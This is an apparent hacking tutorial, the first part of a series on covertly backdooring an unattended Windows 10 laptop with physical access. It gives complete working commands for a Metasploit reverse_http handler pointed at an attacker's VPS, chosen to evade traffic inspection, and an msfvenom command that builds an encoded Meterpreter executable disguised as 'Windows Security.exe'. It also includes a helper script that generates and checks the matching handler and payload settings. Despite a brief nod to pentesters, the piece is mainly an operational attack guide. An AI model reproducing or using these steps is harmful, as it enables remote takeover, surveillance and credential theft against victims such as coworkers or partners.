How to Break into Somebody's Computer Without a Password (Setting Up the Payload)

An unattended Windows 10 laptop can be compromised in under three minutes. With a few clicks, an attacker can disable the antivirus software, plant a backdoor, and capture webcam footage, passwords, and other sensitive personal data.

The question you may be asking now is: why would a hacker do this to my laptop? The answer is simple: there is value in any computer or online account, even your mother's Pinterest. Many people believe they have nothing to lose or nothing to hide, but they should not underestimate the motivation and resourcefulness of an attacker.

By compromising your Windows 10 computer, an attacker can turn it into a web server for hosting malware, spam, phishing pages, and other unwanted content. They can also harvest your contacts, spam others from your email account, steal financial assets, damage your reputation, collect all of your account credentials, use your computer as part of a botnet, and much more.

Even if no sensitive data is stored on the device, an attacker can still use it to carry out illegal activity. Any illegal activity traced back to the device can be linked to the victim and lead to fines, lawsuits, or even imprisonment.


It is also tempting to think that an ordinary personal computer is not a worthwhile target. But if the owner works for a high-value business, the company may be the attacker's real target. Once the compromised computer connects to the company's network, it acts as a foothold that lets the attacker operate inside the network or pivot to other devices on it.

Understanding Attacks

In this article, I will show how an attacker with physical access to a target computer can easily backdoor it. This is a useful technique for a white hat or pentester to add to their arsenal, and for regular users who want to understand and prevent this type of attack.
Most Windows 10 users are unaware that an attacker can view the files and folders on their computer, even after it has been fully shut down, without knowing their password.

Two USB flash drives are required for this attack. USB #1 will be used to create a "live USB" that boots the target computer, while USB #2 carries the payload that will later be dropped onto the target device. Once the live USB has been written to the first drive, it can no longer be used to store ordinary files (i.e., the payload), which is why a second flash drive is needed.

These attacks can be carried out by coworkers, neighbors, hotel staff, roommates, friends, spouses, or anyone with a USB flash drive and three minutes of physical access to the target computer. The attacker will also be able to backdoor the target computer using Metasploit, making it easy to maintain long-term remote access to the device as it moves between Wi-Fi networks anywhere in the world.

Step 1: Create Live USB

A live USB is an external drive containing a complete operating system that boots and runs on a computer without touching the computer's internal storage. Most modern laptops and desktops allow booting from a live USB with no further security checks, unless a firmware password or boot restrictions have been configured.


Popular tools for creating live USBs include Rufus and LinuxLive USB Creator. However, I recommend Etcher, a cross-platform, open-source utility designed to make creating bootable USBs as simple as possible.

A lightweight Linux ISO is recommended, as a smaller image lets Etcher write the live USB faster. Any Linux ISO that lets users try the operating system without installing it will work fine.

When Etcher finishes, remove the USB from the computer. It can now be used to boot a Windows 10 computer and view or modify the sensitive files stored on it.

Step 2: Set Up Your VPS

A virtual private server (VPS) is required to host the Metasploit listener. This is the server the compromised device will connect back to.
Purchasing a VPS has been covered on Null Byte many times before, so I won't go into the details here. If the concept is new to you, check out our general guide on choosing the best VPS provider. Any Debian-based VPS with at least 1,024 MB of RAM and 1 CPU core is enough to run Metasploit.

Step 3: Install Metasploit on the VPS

Metasploit's developers provide a simple installer script that handles the entire installation process. To get started, download the install script and save it to a local file with the command below.

  • curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall

Next, make the file executable with the chmod command.

  • sudo chmod 755 msfinstall

Finally, run the newly created "msfinstall" file as root to install Metasploit.

  • sudo ./msfinstall

The Metasploit installation should complete in under two minutes. The installer script worked flawlessly for me on a Debian 9 VPS. For details on installing Metasploit on other distributions, see the official installation instructions from Rapid7, the developers of Metasploit.

Step 4: Install Screen on the VPS

"Screen" is a program that lets users manage multiple terminal sessions from a single console. It can "detach" from, or close, a terminal window without losing the processes running inside it.


For example, Metasploit needs to keep running after the SSH session to the VPS is closed. If Metasploit is started in a plain SSH session and that session is closed, Metasploit stops running on the VPS. Screen is therefore used to keep Metasploit running in the background. (The original post illustrates this with a GIF of nano kept running inside a Screen session.)

To install Screen, use the apt-get command below.

  • sudo apt-get install screen

To list the current Screen sessions, use the command below. If no sessions are running in the background, the command reports "No Sockets found."

  • screen -list

To start a new Screen session, simply type screen at the prompt and press Enter.

  • screen

Screen will display some copyright and license information. Press Enter to dismiss it. Once inside the session, everything running at the prompt is preserved, whether you close the terminal window or shut down your local computer.

To detach from the session without ending it, press Ctrl + A, then D. The -r argument reconnects to a detached Screen session; the name to pass is the one shown by screen -list (or the one you chose with screen -S).

  • screen -r SESSION-NAME-HERE

The above should be enough to get anyone started with Screen and managing sessions. For a fuller introduction to Screen, check out Tebaut Rousseau's post on DEV.

Step 5: Configure Metasploit

Metasploit supports automation with "resource scripts." These are convenient for anyone who uses Metasploit regularly and does not want to type the same setup commands over and over.
To create a resource script, use nano to create a file on the VPS with the command below.

  • nano ~/automate.rc

This creates an "automate.rc" file in the home folder. Copy and paste the script below into the nano window.

  • use multi/handler
  • set payload windows/meterpreter/reverse_http
  • set LHOST Your.VPS.IP.Here
  • set LPORT 80
  • set ExitOnSession false
  • set EnableStageEncoding true
  • exploit -j

Let's break this script down before moving on, to see what each line does.

  • The payload type used is "windows/meterpreter/reverse_http." This creates an HTTP connection between the target machine and the attacker's server. Attackers often prefer HTTP over a raw TCP connection to avoid DPI (deep packet inspection): raw TCP connections to unusual ports (e.g., port 4444, port 55555, etc.) stand out to anyone monitoring traffic to or from the compromised device.
  • LHOST is the IP address of the attacker's server running Metasploit. "Your.VPS.IP.Here" in the resource file should be replaced with the IP address of the attacker's VPS.
  • LPORT specifies the listening port. HTTP traffic normally travels over port 80, so port 80 is used here to blend in and evade DPI.
  • ExitOnSession false keeps the handler listening after the first session arrives, so the device can reconnect every time it reboots; EnableStageEncoding true encodes the Meterpreter stage as it is sent to the target.
  • The exploit -j line starts the handler as a background job automatically when automate.rc is loaded with msfconsole.

Once the text above is pasted into nano, save and close the file by pressing Ctrl + X, then Y, then Enter.

Msfconsole can now be started inside Screen with the command below, so the handler keeps running after the SSH session is closed.

  • screen msfconsole -r ~/automate.rc

Step 6: Create the Payload

Msfvenom is a combination of msfpayload and msfencode, bringing both tools into a single framework. Msfvenom is the Metasploit command-line tool used to generate and encode all the different types of shellcode found in Metasploit. Most of the time, raw shellcode needs to be encoded to work properly.

A simple, unobfuscated Msfvenom payload was used in this test. In the real world, attackers use more advanced tooling for virtually every task and may be able to evade antivirus entirely. Since the antivirus software is removed during this attack, a basic Msfvenom payload is sufficient here.


Kali Linux was used to generate the Msfvenom payload in this article. To create the payload with Msfvenom, type the command below in a terminal.

  • msfvenom --encoder cmd/powershell_base64 --payload windows/meterpreter/reverse_http LHOST=YourVpsIpHere LPORT=80 --arch x86 --platform win --format exe --out ~/'Windows Security.exe'

There is a lot going on in the above command, so let me break it down.

  • --encoder: This encodes the payload so that it can bypass detection systems by changing the file's original signature. The encoder used here is "cmd/powershell_base64." PowerShell is a scripting language developed by Microsoft to help IT professionals manage systems and perform administrative tasks. Hackers have been using and abusing PowerShell since 2006, when it was introduced for Windows XP and Vista.
  • --payload: The payload type used is "windows/meterpreter/reverse_http." This must match the payload type used in the automate.rc resource file created in the previous step.
  • LHOST=YourVpsIpHere: LHOST is the IP address of the attacker's server running Metasploit. This IP address must match the LHOST used in the automate.rc resource file created in the previous step.
  • LPORT=80: LPORT specifies the destination port. This port number must match the LPORT used in the automate.rc resource file created in the previous step.
  • --arch x86: Older 32-bit Windows computers use the x86 architecture and cannot run 64-bit executables. Newer 64-bit Windows computers can run both x86 and x64 executables, so it makes sense for an attacker to use x86 to cover the widest range of Windows systems.
  • --platform win: This specifies the target platform. Other platforms include Android, macOS, Unix, and Solaris. In this example, the "win" (Windows) platform is used.
  • --format exe: The output format is set to EXE, a Windows executable. It will run on Windows computers without any further user input.
  • --out: Attackers often name their malware and backdoors after something innocuous such as "Windows Security," "Windows Update," or "explorer.exe" to convince users that the process is a harmless part of the operating system. --out sets the filename of the generated payload.
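The handler in automate.rc and the msfvenom command above must agree on payload, LHOST and LPORT, and the two are typed by hand in separate steps. The POSIX shell script below is an added example, not part of the original post or of Metasploit itself: it generates both from a single LHOST/LPORT pair, validates the address and port, and cross-checks an existing .rc file against a msfvenom command line. It does not run msfconsole or msfvenom; the address 203.0.113.10 and the output path are placeholders chosen for the example.

```shell
#!/bin/sh
# Added example (not from the original post): keep automate.rc and the
# msfvenom command in sync. Assumes only a POSIX shell plus grep/awk/sed.

PAYLOAD=windows/meterpreter/reverse_http

# Accept only a dotted-quad IPv4 address with every octet in 0..255.
valid_ipv4() {
    ip=$1
    echo "$ip" | grep -Eq '^([0-9]{1,3}\.){3}[0-9]{1,3}$' || return 1
    old_ifs=$IFS; IFS=.
    set -- $ip
    IFS=$old_ifs
    for octet in "$@"; do
        [ "$octet" -le 255 ] || return 1
    done
    return 0
}

# Print a multi/handler resource script (the contents of automate.rc)
# for the given LHOST and LPORT, refusing malformed values.
render_rc() {
    lhost=$1; lport=$2
    valid_ipv4 "$lhost" || { echo "render_rc: bad LHOST '$lhost'" >&2; return 1; }
    case $lport in ''|*[!0-9]*) echo "render_rc: bad LPORT '$lport'" >&2; return 1;; esac
    [ "$lport" -ge 1 ] && [ "$lport" -le 65535 ] || return 1
    cat <<EOF
use multi/handler
set payload $PAYLOAD
set LHOST $lhost
set LPORT $lport
set ExitOnSession false
set EnableStageEncoding true
exploit -j
EOF
}

# Print the msfvenom command whose payload matches render_rc's handler.
render_venom() {
    lhost=$1; lport=$2; out=$3
    valid_ipv4 "$lhost" || return 1
    printf "msfvenom --encoder cmd/powershell_base64 --payload %s LHOST=%s LPORT=%s --arch x86 --platform win --format exe --out '%s'\n" \
        "$PAYLOAD" "$lhost" "$lport" "$out"
}

# Return 0 when an .rc file and a msfvenom command line agree on payload,
# LHOST and LPORT; catches copy/paste drift between Step 5 and Step 6.
rc_matches_venom() {
    rc_file=$1; venom_cmd=$2
    rc_payload=$(awk '$1=="set" && $2=="payload" {print $3}' "$rc_file")
    rc_lhost=$(awk '$1=="set" && $2=="LHOST" {print $3}' "$rc_file")
    rc_lport=$(awk '$1=="set" && $2=="LPORT" {print $3}' "$rc_file")
    v_payload=$(printf '%s\n' "$venom_cmd" | sed -n 's/.*--payload \([^ ]*\).*/\1/p')
    v_lhost=$(printf '%s\n' "$venom_cmd" | sed -n 's/.*LHOST=\([^ ]*\).*/\1/p')
    v_lport=$(printf '%s\n' "$venom_cmd" | sed -n 's/.*LPORT=\([^ ]*\).*/\1/p')
    [ "$rc_payload" = "$v_payload" ] && [ "$rc_lhost" = "$v_lhost" ] && [ "$rc_lport" = "$v_lport" ]
}

# Usage: sh payload_setup.sh <LHOST> <LPORT> > ~/automate.rc
# The matching msfvenom command is printed on stderr so it is not mixed
# into the resource script. Nothing runs when no arguments are given.
if [ $# -ge 2 ]; then
    render_rc "$1" "$2"
    render_venom "$1" "$2" "$HOME/Windows Security.exe" >&2
fi
```

Run it once on the VPS to produce automate.rc, copy the printed msfvenom line to the Kali machine, and, if either file is edited by hand later, rerun rc_matches_venom before relying on the listener.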

Step 7: Create the USB Payload

After generating the Msfvenom payload, it needs to be stored on the second USB flash drive. Simply insert the second USB into the computer holding the EXE payload, then drag and drop the payload onto it. That's all there is to creating the USB payload.

Get Ready to Exploit the System

In this guide, a live USB was created, Metasploit was installed and configured on the remote server, and a simple Msfvenom payload was generated. With all of that set up, the next part covers booting the target computer into the live environment, disabling Windows Defender (and other security software), and embedding the payload on the device. The payload will execute each time the device restarts, creating a new connection between the compromised computer and the attacker's server.
